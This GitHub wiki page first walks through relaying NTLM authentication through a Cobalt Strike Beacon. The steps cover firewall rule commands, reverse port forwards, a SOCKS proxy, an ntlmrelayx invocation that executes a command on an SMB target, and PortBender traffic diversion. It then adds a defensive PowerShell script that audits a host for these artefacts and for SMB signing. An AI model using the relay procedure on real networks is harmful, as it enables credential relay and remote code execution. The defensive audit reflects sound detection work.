NTLM Relay through CS - CraigDonkin/Infrastructure GitHub Wiki

1. Obtain a Beacon running as SYSTEM.
2. Allow ports 8445 and 8080 inbound on the host firewall (Beacon console commands):

```
powershell New-NetFirewallRule -DisplayName "8445" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
powershell New-NetFirewallRule -DisplayName "8080" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
```

3. Configure reverse port forwards so that traffic reaching the Beacon host on 8080 and 8445 is sent back to the team server on 80 and 445:

```
rportfwd 8080 localhost 80
rportfwd 8445 localhost 445
```

4. Start a SOCKS proxy:

```
socks 1080
```

5. Configure proxychains to use the SOCKS proxy on port 1080.
6. Run ntlmrelayx through proxychains:

```
proxychains ntlmrelayx.py -t smb://<target> -smb2support --no-http-server --no-wcf-server -c <command>
```

If a payload is hosted on the team server (e.g. `blah:80/payload`), the URL handed out must use the IP of the Beacon host being proxied through, on port 8080; the rportfwd above redirects 8080 back to port 80 on the team server.

7. Upload PortBender (https://github.com/praetorian-inc/PortBender) to the `C:\Windows\system32\drivers` folder and load `PortBender.cna` via Cobalt Strike > Script Manager.
8. Use PortBender to redirect traffic from TCP/445 to TCP/8445:

```
PortBender redirect 445 8445
```
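From the defender's side, the procedure above leaves checkable artefacts on the Beacon host (the two inbound firewall rules, listeners on the redirect ports, a packet-diversion driver in the drivers folder), and whether the relay to `smb://<target>` succeeds at all depends on SMB signing. The following audit script is an added example, not part of the original wiki; the port numbers and rule names are taken from the steps above, and the `WinDivert*.sys` filename (the driver PortBender relies on) is an assumption.

```powershell
# Added example: audit a host for artefacts of the relay setup above and for the
# SMB signing settings that decide whether NTLM relay to SMB works against it.
# Ports and rule names are assumptions taken from the wiki steps.

$suspectPorts = @('8445', '8080')   # inbound ports opened in step 2

# 1. Enabled inbound allow rules on the ports the procedure opens.
$rules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
    ForEach-Object {
        $rule = $_
        Get-NetFirewallPortFilter -AssociatedNetFirewallRule $rule |
            Where-Object { $_.Protocol -eq 'TCP' -and ($suspectPorts -contains "$($_.LocalPort)") } |
            ForEach-Object { [pscustomobject]@{ Rule = $rule.DisplayName; Port = $_.LocalPort } }
    }
if ($rules) {
    Write-Warning 'Inbound allow rules on relay ports found:'
    $rules | Format-Table -AutoSize
}

# 2. A packet-diversion driver in the drivers folder (filename is an assumption).
Get-ChildItem "$env:SystemRoot\System32\drivers" -Filter 'WinDivert*.sys' -ErrorAction SilentlyContinue |
    ForEach-Object { Write-Warning "Packet-diversion driver present: $($_.FullName)" }

# 3. Anything still listening on the redirect ports.
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $suspectPorts -contains "$($_.LocalPort)" } |
    ForEach-Object { Write-Warning "Listener on TCP/$($_.LocalPort) (PID $($_.OwningProcess))" }

# 4. SMB signing: a target that requires signing rejects relayed SMB sessions.
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration
[pscustomobject]@{
    ServerRequiresSigning = $srv.RequireSecuritySignature
    ClientRequiresSigning = $cli.RequireSecuritySignature
} | Format-List
if (-not $srv.RequireSecuritySignature) {
    Write-Warning 'SMB server does not require signing; this host is exposed to NTLM relay.'
}
```

Run it in an elevated PowerShell session; the firewall and SMB cmdlets need administrator rights to return complete results.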
